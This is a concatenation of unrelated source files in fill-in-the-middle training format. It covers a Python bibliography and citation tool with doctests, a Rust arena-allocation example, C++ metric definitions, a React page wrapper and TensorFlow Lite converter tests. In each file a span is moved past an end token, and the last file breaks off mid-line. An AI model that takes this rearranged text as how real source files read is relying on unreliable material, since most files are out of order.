If it finds the work, it returns it Otherwise, it updates pyref and display to include a valid letter Doctest: .. 
doctest:: >>> reload() >>> work = work_by_varname('murta2014a') >>> paper = {'pyref': 'murta2014a', 'authors': 'Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana', 'name': 'noWorkflow: capturing and analyzing provenance of scripts', 'year': 2014} >>> find_work_by_info(paper) == work True >>> paper = {'pyref': 'murta2014a', 'authors': 'Murta, Leonardo', 'name': 'Other', 'year': 2014, 'display': 'murta'} >>> find_work_by_info(paper) is None True >>> paper['pyref'] 'murta2014b' >>> paper['display'] 'murta b' """ rules = rules or config.FIND_INFO_WORK def update_old(old, new, rules): ignore = callable_get(rules, "<ignore>", []) for key, value in new.items(): if key not in ignore: old[key] = value for key, value in rules.get("<skip>", []): if paper.get(key, "") == value: dset(paper, "pyref", "None") return None pyrefs = pyrefs or set() letter = ord("a") - 1 convert = ConvertDict(rules) new_paper = convert.run(paper) old_paper, paper = paper, new_paper worklist = load_work_map(paper["_year"]) if paper["_year"] == 0: worklist = load_work_map_all_years() if "_work" in paper: key = paper["_key"] work = paper["_work"] work, letter = compare_paper_to_work(letter, key, work, paper) if work: update_old(old_paper, paper, rules) return work for key, work in worklist: work, letter = compare_paper_to_work(letter, key, work, paper) if work: update_old(old_paper, paper, rules) return work for key in pyrefs: if dhas(paper, "pyref") and key.startswith(dget(paper, "pyref")): lastletter = key[-1] if key[-1].isalpha() else "a" letter = max(ord(lastletter) + 1, ord(letter)) if letter != ord("a") - 1: letter = chr(letter) config.set_info_letter(paper, letter) update_old(old_paper, paper, rules) return None def find_citation(citer, cited): """Find citation in the local database Returns the citation if the `citer` work cites the `cited` work Doctest: .. doctest:: >>> reload() >>> murta2014a = work_by_varname("murta2014a") >>> freire2008a = work_by_varname("freire2008a") >>> pimentel2015a = work_by_varname("pimentel2015a") >>> citation = find_citation(murta2014a, freire2008a) >>> citation is None False >>> citation.ref '5' Not found: >>> citation = find_citation(pimentel2015a, freire2008a) >>> citation is None True """ for citation in load_citations(): if citation.work == citer and citation.citation == cited: return citation return None def find_global_local_citation(citer, cited, file=None): """Find citations locally and globally for the works We use it to check if there is citation redefinition Doctest: .. 
doctest:: >>> reload() >>> murta2014a = work_by_varname("murta2014a") >>> freire2008a = work_by_varname("freire2008a") >>> pimentel2015a = work_by_varname("pimentel2015a") >>> glo, loc = find_global_local_citation(murta2014a, freire2008a, "random") >>> glo is None False >>> glo.ref '5' >>> loc is None True >>> fname = "murta2014a" >>> glo, loc = find_global_local_citation(murta2014a, freire2008a, fname) >>> glo is None False >>> glo.ref '5' >>> loc is None False >>> loc is glo True """ glob, loc = None, None for citation in load_citations(): if citation.work == citer and citation.citation == cited: if file == citation._citations_file or not file: glob = loc = citation break else: glob = citation return glob, loc def find_local_citation(wo1, wo2, backward, citation_file=None, warning=None): if backward: wo1, wo2 = wo2, wo1 global_citation, local_citation = find_global_local_citation( wo1, wo2, file=citation_file ) if global_citation and not local_citation and warning: warning("Duplicate citation: {} -> {}".format( oget(wo1, "metakey"), oget(wo2, "metakey"), )) return local_citation def work_to_bibtex_entry(work, name=None, homogeneize=True, acronym=False, rules=None): """Convert work to BibTeX entry dict for bibtexparser Doctest: .. doctest:: >>> reload() >>> murta2014a = work_by_varname("murta2014a") >>> result = work_to_bibtex_entry(murta2014a) >>> list(result) ['ID', 'address', 'publisher', 'pages', 'author', 'title', 'ENTRYTYPE', 'booktitle', 'year'] >>> result['ID'] 'murta2014a' >>> result['address'] 'Cologne, Germany' >>> result['publisher'] 'Springer' >>> result['pages'] '71--83' >>> result['booktitle'] 'International Provenance and Annotation Workshop' >>> result['author'] # doctest: +ELLIPSIS 'Murta, Leonardo and Braganholo, Vanessa and ... and Freire, Juliana' >>> result['title'] 'no{W}orkflow: capturing and analyzing provenance of scripts' >>> result['year'] '2014' >>> result['ENTRYTYPE'] 'inproceedings' Custom name: >>> result = work_to_bibtex_entry(murta2014a, name="other") >>> list(result) ['ID', 'address', 'publisher', 'pages', 'author', 'title', 'ENTRYTYPE', 'booktitle', 'year'] >>> result['ID'] 'other' Use acronym for place name: >>> result = work_to_bibtex_entry(murta2014a, acronym=True) >>> list(result) ['ID', 'address', 'publisher', 'pages', 'author', 'title', 'ENTRYTYPE', 'booktitle', 'year'] >>> result['booktitle'] 'IPAW' """ converter = ConvertWork(rules or config.WORK_TO_BIBTEX) return converter.run(work, new=OrderedDict({ "_name": name, "_acronym": acronym, "_homogeneize": homogeneize, })) def work_to_bibtex(work, name=None, acronym=False, rules=None): """Convert work to bibtex text Doctest: .. 
doctest:: >>> reload() >>> murta2014a = work_by_varname("murta2014a") >>> print(work_to_bibtex(murta2014a)) @inproceedings{murta2014a, address = {Cologne, Germany}, author = {Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana}, booktitle = {International Provenance and Annotation Workshop}, pages = {71--83}, publisher = {Springer}, title = {no{W}orkflow: capturing and analyzing provenance of scripts}, year = {2014} } <BLANKLINE> <BLANKLINE> Custom name: >>> reload() >>> murta2014a = work_by_varname("murta2014a") >>> print(work_to_bibtex(murta2014a, name="other")) @inproceedings{other, address = {Cologne, Germany}, author = {Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana}, booktitle = {International Provenance and Annotation Workshop}, pages = {71--83}, publisher = {Springer}, title = {no{W}orkflow: capturing and analyzing provenance of scripts}, year = {2014} } <BLANKLINE> <BLANKLINE><|fim▁hole|> @inproceedings{murta2014a, address = {Cologne, Germany}, author = {Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana}, booktitle = {IPAW}, pages = {71--83}, publisher = {Springer}, title = {no{W}orkflow: capturing and analyzing provenance of scripts}, year = {2014} } <BLANKLINE> <BLANKLINE> """ result = work_to_bibtex_entry(work, name=name, acronym=acronym, rules=rules) db = BibDatabase() db.entries = [result] writer = BibTexWriter() writer.indent = " " return writer.write(db) def match_bibtex_to_work(bibtex_str): """Find works by bibtex entries Returns a list of matches: (entry, work) Doctest: .. doctest:: >>> reload() >>> bibtex = ''' @inproceedings{murta2014a, ... address = {Cologne, Germany}, ... author = {Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana}, ... booktitle = {IPAW}, ... pages = {71--83}, ... publisher = {Springer}, ... title = {no{W}orkflow: capturing and analyzing provenance of scripts}, ... year = {2014} ... } ''' >>> works = match_bibtex_to_work(bibtex) >>> murta2014a = work_by_varname("murta2014a") >>> works[0][1] is murta2014a True """ entries = parse_bibtex(bibtex_str) return [ (entry, find_work_by_info(bibtex_to_info(copy(entry)))) for entry in entries ] def find(text): """Find work by text in any of its attributes""" words = text.split() for work in load_work(): match = True for word in words: if not any(word.lower() in str(getattr(work, attr)).lower() for attr in dir(work) if not attr.startswith("_")): match = False break if match: yield work def find_line(work): """Find work position in file Arguments: * `work` -- work object Doctest: .. 
doctest:: >>> from .operations import reload, work_by_varname >>> reload() >>> murta2014a = work_by_varname("murta2014a") >>> find_line(murta2014a) 6 """ import re with open(year_file(oget(work, "year")), "rb") as f: return [ index for index, line in enumerate(f) if re.findall("(^{}\\s=)".format(oget(work, "metakey")).encode(), line) ][0] + 1 def invoke_editor(work): """Open work in a given line with the configured editor""" if not config.TEXT_EDITOR or not config.LINE_PARAMS: warnings.warn("You must set the config.TEXT_EDITOR and config.LINE_PARAMS to use this function") return subprocess.call(( config.TEXT_EDITOR + " " + config.LINE_PARAMS.format( year_path=year_file(oget(work, "year")), line=find_line(work) ) ), shell=True) def create_info_code(nwork, info, citation_var, citation_file, should_add, ref=""): """Create insertion code with both code and citation""" citations = "" text = "insert('''" if nwork is None: text += info_to_code(info) + "\n" if should_add["citation"] and citation_var: text += citation_text( citation_var, info, ref=ref, backward=should_add["backward"] ) + "\n" citations = ", citations='{}'".format(citation_file) text += "'''{});".format(citations) if text == "insert('''''');": text = "" if nwork and should_add["set"] and "(" not in dget(info, "pyref"): text += "\n" + changes_dict_to_set_attribute(dget(info, "pyref"), should_add["set"]) return { "code": text.strip(), "extra": config.check_insertion( nwork, info, citation_var, citation_file, should_add, ref="" ) } def should_add_info( info, citation, article=None, backward=False, citation_file=None, warning=lambda x: None, set_scholar=False, article_rules=None, bibtex_rules=None, add_citation=True ): """Check if there is anything to add for this info""" convert = ConvertDict(article_rules or config.ARTICLE_TO_INFO) info = convert.run(info, article=article) nwork = consume(info, "_nwork") should_add = { "add": False, "citation": citation, "set": {}, "backward": backward, } if not nwork or (not citation and add_citation): should_add["add"] = True should_add["citation"] = citation return should_add, nwork, info changes = set_by_info(nwork, info, set_scholar=set_scholar, rules=bibtex_rules or config.BIBTEX_TO_INFO) should_add["set"] = changes["set"] if should_add["set"]: should_add["add"] = True if add_citation: local_citation = find_local_citation( nwork, citation, backward, citation_file=citation_file, warning=warning ) if local_citation: should_add["citation"] = None else: should_add["add"] = True return should_add, nwork, info class Metakey(object): """Convert work or list of work to metakey .. doctest:: >>> reload() >>> murta2014a = work_by_varname("murta2014a") >>> murta2014a @ Metakey() 'murta2014a' >>> [murta2014a] @ Metakey() ['murta2014a'] """ def __rmatmul__(self, x): if hasattr(x, "__iter__"): return [y @ self for y in x] return oget(x, "metakey") class MetakeyTitle(object): """Convert work or list of work to metakey - title .. doctest:: >>> reload() >>> murta2014a = work_by_varname("murta2014a") >>> murta2014a @ MetakeyTitle() 'murta2014a - noWorkflow: capturing and analyzing provenance of scripts' >>> [murta2014a] @ MetakeyTitle() ['murta2014a - noWorkflow: capturing and analyzing provenance of scripts'] """ def __rmatmul__(self, x): if hasattr(x, "__iter__"): return [y @ self for y in x] return "{} - {}".format( oget(x, "metakey"), oget(x, "name"), ) class WDisplay(object): """Convert work or list of work to display .. 
doctest:: >>> reload() >>> murta2014a = work_by_varname("murta2014a") >>> murta2014a @ WDisplay() 'no Work flow' >>> [murta2014a] @ WDisplay() ['no Work flow'] """ def __rmatmul__(self, x): if hasattr(x, "__iter__"): return [y @ self for y in x] return config.work_display(x) metakey = Metakey() metakey_title = MetakeyTitle() wdisplay = WDisplay() def check_config_deprecation(): if hasattr(config, "WORK_BIBTEX_MAP"): warnings.warn(textwrap.dedent("""The configuration config.WORK_BIBTEX_MAP is not supported anymore. It was replaced by config.WORK_TO_BIBTEX, which is more complete. Please, modify it according to your needs """)) if hasattr(config, "FORM_BUTTONS"): old_form_to_new(show_deprecation=True)<|fim▁end|>
    Use acronym for place name:

    >>> print(work_to_bibtex(murta2014a, acronym=True))
<|file_name|>arena_storage_pool.rs<|end_file_name|><|fim▁begin|>// Implements http://rosettacode.org/wiki/Arena_storage_pool #![feature(rustc_private)] extern crate arena; <|fim▁hole|>fn main() { // Memory is allocated using the default allocator (currently jemalloc). The memory is // allocated in chunks, and when one chunk is full another is allocated. This ensures that // references to an arena don't become invalid when the original chunk runs out of space. The // chunk size is configurable as an argument to TypedArena::with_capacity if necessary. let arena = TypedArena::new(); // The arena crate contains two types of arenas: TypedArena and Arena. Arena is // reflection-basd and slower, but can allocate objects of any type. TypedArena is faster, and // can allocate only objects of one type. The type is determined by type inference--if you try // to allocate an integer, then Rust's compiler knows it is an integer arena. let v1 = arena.alloc(1i32); // TypedArena returns a mutable reference let v2 = arena.alloc(3); *v2 += 38; println!("{}", *v1 + *v2); // The arena's destructor is called as it goes out of scope, at which point it deallocates // everything stored within it at once. }<|fim▁end|>
use arena::TypedArena;

#[cfg(not(test))]
<|file_name|>palo_metrics.cpp<|end_file_name|><|fim▁begin|>// Modifications copyright (C) 2017, Baidu.com, Inc. // Copyright 2017 The Apache Software Foundation // Licensed to the Apache Software Foundation (ASF) under one // or more contributor license agreements. See the NOTICE file // distributed with this work for additional information // regarding copyright ownership. The ASF licenses this file // to you under the Apache License, Version 2.0 (the // "License"); you may not use this file except in compliance // with the License. You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, // software distributed under the License is distributed on an // "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY // KIND, either express or implied. See the License for the // specific language governing permissions and limitations // under the License. #include "util/palo_metrics.h" #include "util/debug_util.h" namespace palo { // Naming convention: Components should be separated by '.' and words should // be separated by '-'. const char* PALO_BE_START_TIME = "palo_be.start_time"; const char* PALO_BE_VERSION = "palo_be.version"; const char* PALO_BE_READY = "palo_be.ready"; const char* PALO_BE_NUM_FRAGMENTS = "palo_be.num_fragments"; const char* TOTAL_SCAN_RANGES_PROCESSED = "palo_be.scan_ranges.total"; const char* NUM_SCAN_RANGES_MISSING_VOLUME_ID = "palo_be.scan_ranges.num_missing_volume_id"; const char* MEM_POOL_TOTAL_BYTES = "palo_be.mem_pool.total_bytes"; const char* HASH_TABLE_TOTAL_BYTES = "palo_be.hash_table.total_bytes"; const char* OLAP_LRU_CACHE_LOOKUP_COUNT = "palo_be.olap.lru_cache.lookup_count"; const char* OLAP_LRU_CACHE_HIT_COUNT = "palo_be.olap.lru_cache.hit_count"; const char* PALO_PUSH_COUNT = "palo_be.olap.push_count"; const char* PALO_FETCH_COUNT = "palo_be.olap.fetch_count"; const char* PALO_REQUEST_COUNT = "palo_be.olap.request_count"; const char* BE_MERGE_DELTA_NUM = "palo_be.olap.be_merge.delta_num"; const char* BE_MERGE_SIZE = "palo_be.olap.be_merge_size"; const char* CE_MERGE_DELTA_NUM = "palo_be.olap.ce_merge.delta_num"; const char* CE_MERGE_SIZE = "palo_be.olap.ce_merge_size"; const char* IO_MGR_NUM_BUFFERS = "palo_be.io_mgr.num_buffers"; const char* IO_MGR_NUM_OPEN_FILES = "palo_be.io_mgr.num_open_files"; const char* IO_MGR_NUM_UNUSED_BUFFERS = "palo_be.io_mgr.num_unused_buffers"; // const char* IO_MGR_NUM_CACHED_FILE_HANDLES = "palo_be.io_mgr_num_cached_file_handles"; const char* IO_MGR_NUM_FILE_HANDLES_OUTSTANDING = "palo_be.io_mgr.num_file_handles_outstanding"; // const char* IO_MGR_CACHED_FILE_HANDLES_HIT_COUNT = "palo_be.io_mgr_cached_file_handles_hit_count"; // const char* IO_MGR_CACHED_FILE_HANDLES_MISS_COUNT = "palo_be.io_mgr_cached_file_handles_miss_count"; const char* IO_MGR_TOTAL_BYTES = "palo_be.io_mgr.total_bytes"; // const char* IO_MGR_BYTES_READ = "palo_be.io_mgr_bytes_read"; // const char* IO_MGR_LOCAL_BYTES_READ = "palo_be.io_mgr_local_bytes_read"; // const char* IO_MGR_CACHED_BYTES_READ = "palo_be.io_mgr_cached_bytes_read"; // const char* IO_MGR_SHORT_CIRCUIT_BYTES_READ = "palo_be.io_mgr_short_circuit_bytes_read"; const char* IO_MGR_BYTES_WRITTEN = "palo_be.io_mgr.bytes_written"; const char* NUM_QUERIES_SPILLED = "palo_be.num_queries_spilled"; // These are created by palo_be during startup. 
StringProperty* PaloMetrics::_s_palo_be_start_time = NULL; StringProperty* PaloMetrics::_s_palo_be_version = NULL; BooleanProperty* PaloMetrics::_s_palo_be_ready = NULL; IntCounter* PaloMetrics::_s_palo_be_num_fragments = NULL; IntCounter* PaloMetrics::_s_num_ranges_processed = NULL; IntCounter* PaloMetrics::_s_num_ranges_missing_volume_id = NULL; IntGauge* PaloMetrics::_s_mem_pool_total_bytes = NULL; IntGauge* PaloMetrics::_s_hash_table_total_bytes = NULL; IntCounter* PaloMetrics::_s_olap_lru_cache_lookup_count = NULL; IntCounter* PaloMetrics::_s_olap_lru_cache_hit_count = NULL; IntCounter* PaloMetrics::_s_palo_push_count = NULL; IntCounter* PaloMetrics::_s_palo_fetch_count = NULL; IntCounter* PaloMetrics::_s_palo_request_count = NULL; IntCounter* PaloMetrics::_s_be_merge_delta_num = NULL; IntCounter* PaloMetrics::_s_be_merge_size = NULL; IntCounter* PaloMetrics::_s_ce_merge_delta_num = NULL; IntCounter* PaloMetrics::_s_ce_merge_size = NULL; IntGauge* PaloMetrics::_s_io_mgr_num_buffers = NULL; IntGauge* PaloMetrics::_s_io_mgr_num_open_files = NULL; IntGauge* PaloMetrics::_s_io_mgr_num_unused_buffers = NULL; // IntGauge* PaloMetrics::_s_io_mgr_num_cached_file_handles = NULL; IntGauge* PaloMetrics::_s_io_mgr_num_file_handles_outstanding = NULL; // IntGauge* PaloMetrics::_s_io_mgr_cached_file_handles_hit_count = NULL; // IntGauge* PaloMetrics::_s_io_mgr_cached_file_handles_miss_count = NULL; IntGauge* PaloMetrics::_s_io_mgr_total_bytes = NULL; // IntGauge* PaloMetrics::_s_io_mgr_bytes_read = NULL; // IntGauge* PaloMetrics::_s_io_mgr_local_bytes_read = NULL; // IntGauge* PaloMetrics::_s_io_mgr_cached_bytes_read = NULL; // IntGauge* PaloMetrics::_s_io_mgr_short_circuit_bytes_read = NULL; IntCounter* PaloMetrics::_s_io_mgr_bytes_written = NULL; IntCounter* PaloMetrics::_s_num_queries_spilled = NULL; void PaloMetrics::create_metrics(MetricGroup* m) { // Initialize impalad metrics _s_palo_be_start_time = m->AddProperty<std::string>( PALO_BE_START_TIME, ""); _s_palo_be_version = m->AddProperty<std::string>( PALO_BE_VERSION, get_version_string(true)); _s_palo_be_ready = m->AddProperty(PALO_BE_READY, false); _s_palo_be_num_fragments = m->AddCounter(PALO_BE_NUM_FRAGMENTS, 0L); // Initialize scan node metrics _s_num_ranges_processed = m->AddCounter(TOTAL_SCAN_RANGES_PROCESSED, 0L); _s_num_ranges_missing_volume_id = m->AddCounter(NUM_SCAN_RANGES_MISSING_VOLUME_ID, 0L); // Initialize memory usage metrics _s_mem_pool_total_bytes = m->AddGauge(MEM_POOL_TOTAL_BYTES, 0L); _s_hash_table_total_bytes = m->AddGauge(HASH_TABLE_TOTAL_BYTES, 0L); // Initialize olap metrics _s_olap_lru_cache_lookup_count = m->AddCounter(OLAP_LRU_CACHE_LOOKUP_COUNT, 0L); _s_olap_lru_cache_hit_count = m->AddCounter(OLAP_LRU_CACHE_HIT_COUNT, 0L); // Initialize push_count, fetch_count, request_count metrics _s_palo_push_count = m->AddCounter(PALO_PUSH_COUNT, 0L); _s_palo_fetch_count = m->AddCounter(PALO_FETCH_COUNT, 0L); _s_palo_request_count = m->AddCounter(PALO_REQUEST_COUNT, 0L); // Initialize be/ce merge metrics _s_be_merge_delta_num = m->AddCounter(BE_MERGE_DELTA_NUM, 0L); _s_be_merge_size = m->AddCounter(BE_MERGE_SIZE, 0L); _s_ce_merge_delta_num = m->AddCounter(CE_MERGE_DELTA_NUM, 0L); _s_ce_merge_size = m->AddCounter(CE_MERGE_SIZE, 0L); // Initialize metrics relate to spilling to disk // _s_io_mgr_bytes_read // = m->AddGauge(IO_MGR_BYTES_READ, 0L); // _s_io_mgr_local_bytes_read<|fim▁hole|> // = m->AddGauge(IO_MGR_SHORT_CIRCUIT_BYTES_READ, 0L); _s_io_mgr_bytes_written = m->AddCounter(IO_MGR_BYTES_WRITTEN, 0L); 
_s_io_mgr_num_buffers = m->AddGauge(IO_MGR_NUM_BUFFERS, 0L); _s_io_mgr_num_open_files = m->AddGauge(IO_MGR_NUM_OPEN_FILES, 0L); _s_io_mgr_num_unused_buffers = m->AddGauge(IO_MGR_NUM_UNUSED_BUFFERS, 0L); _s_io_mgr_num_file_handles_outstanding = m->AddGauge(IO_MGR_NUM_FILE_HANDLES_OUTSTANDING, 0L); _s_io_mgr_total_bytes = m->AddGauge(IO_MGR_TOTAL_BYTES, 0L); _s_num_queries_spilled = m->AddCounter(NUM_QUERIES_SPILLED, 0L); } }<|fim▁end|>
    //     = m->AddGauge(IO_MGR_LOCAL_BYTES_READ, 0L);
    // _s_io_mgr_cached_bytes_read
    //     = m->AddGauge(IO_MGR_CACHED_BYTES_READ, 0L);
    // _s_io_mgr_short_circuit_bytes_read
<|file_name|>page-wrap.tsx<|end_file_name|><|fim▁begin|>import { FC, createElement as h } from 'react'; import { PageProps } from '@not-govuk/app-composer'; import { Page } from '@hods/components'; import './app.scss'; export const PageWrap: FC<PageProps> = ({ routes, children }) => { const compare = (a, b) => ( a.href > b.href<|fim▁hole|> : -1 ); const navigation = routes .map(e => ({ href: e.href, text: e.title })) .sort(compare); return ( <Page footerNavigation={navigation} navigation={navigation} title="My new service" > {children} </Page> ); }; export default PageWrap;<|fim▁end|>
? 1
<|file_name|>lite_test.py<|end_file_name|><|fim▁begin|># Copyright 2018 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for lite.py.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import tempfile import numpy as np from tensorflow.contrib.lite.python import lite from tensorflow.contrib.lite.python import lite_constants from tensorflow.contrib.lite.python.interpreter import Interpreter from tensorflow.python import keras from tensorflow.python.client import session from tensorflow.python.framework import constant_op from tensorflow.python.framework import dtypes from tensorflow.python.framework import test_util from tensorflow.python.ops import array_ops from tensorflow.python.ops import math_ops from tensorflow.python.ops import variable_scope from tensorflow.python.ops.variables import global_variables_initializer as _global_variables_initializer from tensorflow.python.platform import gfile from tensorflow.python.platform import resource_loader from tensorflow.python.platform import test from tensorflow.python.saved_model import saved_model from tensorflow.python.training.training_util import write_graph class FromConstructor(test_util.TensorFlowTestCase): # Tests invalid constructors using a dummy value for the GraphDef. def testInvalidConstructor(self): message = ('If input_tensors and output_tensors are None, both ' 'input_arrays_with_shape and output_arrays must be defined.') # `output_arrays` is not defined. with self.assertRaises(ValueError) as error: lite.TocoConverter( None, None, [], input_arrays_with_shape=[('input', [3, 9])]) self.assertEqual(message, str(error.exception)) # `input_arrays_with_shape` is not defined. with self.assertRaises(ValueError) as error: lite.TocoConverter(None, [], None, output_arrays=['output']) self.assertEqual(message, str(error.exception)) # Tests valid constructors using a dummy value for the GraphDef. def testValidConstructor(self): converter = lite.TocoConverter( None, None, None, input_arrays_with_shape=[('input', [3, 9])], output_arrays=['output']) self.assertFalse(converter._has_valid_tensors()) self.assertEqual(converter.get_input_arrays(), ['input']) with self.assertRaises(ValueError) as error: converter._set_batch_size(1) self.assertEqual( 'The batch size cannot be set for this model. Please use ' 'input_shapes parameter.', str(error.exception)) converter = lite.TocoConverter(None, ['input_tensor'], ['output_tensor']) self.assertTrue(converter._has_valid_tensors()) class FromSessionTest(test_util.TensorFlowTestCase): def testFloat(self): in_tensor = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32) out_tensor = in_tensor + in_tensor sess = session.Session() # Convert model and ensure model is not None. 
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor]) tflite_model = converter.convert() self.assertTrue(tflite_model) # Check values from converted model. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(1, len(input_details))<|fim▁hole|> self.assertEqual((0., 0.), input_details[0]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('add', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all()) self.assertEqual((0., 0.), output_details[0]['quantization']) def testQuantization(self): in_tensor_1 = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputA') in_tensor_2 = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputB') out_tensor = array_ops.fake_quant_with_min_max_args( in_tensor_1 + in_tensor_2, min=0., max=1., name='output') sess = session.Session() # Convert model and ensure model is not None. converter = lite.TocoConverter.from_session( sess, [in_tensor_1, in_tensor_2], [out_tensor]) converter.inference_type = lite_constants.QUANTIZED_UINT8 converter.quantized_input_stats = { 'inputA': (0., 1.), 'inputB': (0., 1.) } # mean, std_dev tflite_model = converter.convert() self.assertTrue(tflite_model) # Check values from converted model. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(2, len(input_details)) self.assertEqual('inputA', input_details[0]['name']) self.assertEqual(np.uint8, input_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all()) self.assertEqual((1., 0.), input_details[0]['quantization']) # scale, zero_point self.assertEqual('inputB', input_details[1]['name']) self.assertEqual(np.uint8, input_details[1]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[1]['shape']).all()) self.assertEqual((1., 0.), input_details[1]['quantization']) # scale, zero_point output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('output', output_details[0]['name']) self.assertEqual(np.uint8, output_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all()) self.assertTrue(output_details[0]['quantization'][0] > 0) # scale def testQuantizationInvalid(self): in_tensor_1 = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputA') in_tensor_2 = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputB') out_tensor = array_ops.fake_quant_with_min_max_args( in_tensor_1 + in_tensor_2, min=0., max=1., name='output') sess = session.Session() # Convert model and ensure model is not None. converter = lite.TocoConverter.from_session( sess, [in_tensor_1, in_tensor_2], [out_tensor]) converter.inference_type = lite_constants.QUANTIZED_UINT8 converter.quantized_input_stats = {'inputA': (0., 1.)} # mean, std_dev with self.assertRaises(ValueError) as error: converter.convert() self.assertEqual( 'Quantization input stats are not available for input tensors ' '\'inputB\'.', str(error.exception)) def testSizeNoneInvalid(self): in_tensor = array_ops.placeholder(dtype=dtypes.float32) out_tensor = in_tensor + in_tensor sess = session.Session() # Test invalid shape. None after 1st dimension. 
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor]) with self.assertRaises(ValueError) as error: converter.convert() self.assertEqual('Provide an input shape for input array \'Placeholder\'.', str(error.exception)) def testBatchSizeInvalid(self): in_tensor = array_ops.placeholder( shape=[1, None, 16, 3], dtype=dtypes.float32) out_tensor = in_tensor + in_tensor sess = session.Session() # Test invalid shape. None after 1st dimension. converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor]) with self.assertRaises(ValueError) as error: converter.convert() self.assertEqual( 'None is only supported in the 1st dimension. Tensor ' '\'Placeholder\' has invalid shape \'[1, None, 16, 3]\'.', str(error.exception)) def testBatchSizeValid(self): in_tensor = array_ops.placeholder( shape=[None, 16, 16, 3], dtype=dtypes.float32) out_tensor = in_tensor + in_tensor sess = session.Session() # Convert model and ensure model is not None. converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor]) tflite_model = converter.convert() self.assertTrue(tflite_model) # Check values from converted model. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(1, len(input_details)) self.assertEqual('Placeholder', input_details[0]['name']) self.assertEqual(np.float32, input_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all()) self.assertEqual((0., 0.), input_details[0]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('add', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all()) self.assertEqual((0., 0.), output_details[0]['quantization']) def testFreezeGraph(self): in_tensor = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32) var = variable_scope.get_variable( 'weights', shape=[1, 16, 16, 3], dtype=dtypes.float32) out_tensor = in_tensor + var sess = session.Session() sess.run(_global_variables_initializer()) # Convert model and ensure model is not None. converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor]) tflite_model = converter.convert() self.assertTrue(tflite_model) # Check values from converted model. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(1, len(input_details)) self.assertEqual('Placeholder', input_details[0]['name']) self.assertEqual(np.float32, input_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all()) self.assertEqual((0., 0.), input_details[0]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('add', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all()) self.assertEqual((0., 0.), output_details[0]['quantization']) # TODO(nupurgarg): Verify value of contents in GraphViz. def testGraphviz(self): in_tensor = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32) out_tensor = in_tensor + in_tensor sess = session.Session() # Convert model and ensure model is not None. 
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor]) converter.output_format = lite_constants.GRAPHVIZ_DOT graphviz_output = converter.convert() self.assertTrue(graphviz_output) # TODO(nupurgarg): Verify value of contents in GraphViz. def testDumpGraphviz(self): in_tensor = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32) out_tensor = in_tensor + in_tensor sess = session.Session() # Convert model and ensure model is not None. converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor]) graphviz_dir = self.get_temp_dir() converter.dump_graphviz_dir = graphviz_dir tflite_model = converter.convert() self.assertTrue(tflite_model) # Ensure interpreter is able to allocate and check graphviz data. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() num_items_graphviz = len(os.listdir(graphviz_dir)) self.assertTrue(num_items_graphviz) # Convert model and ensure model is not None. converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor]) graphviz_dir = self.get_temp_dir() converter.dump_graphviz_dir = 